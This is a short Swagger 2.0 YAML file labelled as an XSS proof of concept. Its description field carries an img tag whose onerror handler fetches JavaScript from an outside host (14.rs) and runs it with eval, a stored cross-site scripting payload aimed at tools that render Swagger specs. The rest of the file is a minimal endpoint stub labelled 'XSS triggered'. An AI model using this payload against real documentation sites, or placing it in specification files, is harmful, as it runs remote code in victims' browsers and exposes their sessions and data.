swagger: "2.0"
info:
  title: XSS Swagger POC
  description: >
    <img src=x onerror="fetch('https://14.rs/').then(r=>r.text()).then(eval)">
  version: "XSSv1"
paths:
  /:
    get:
      summary: "XSS endpoint"
      responses:
        '200':
          description: "XSS triggered"
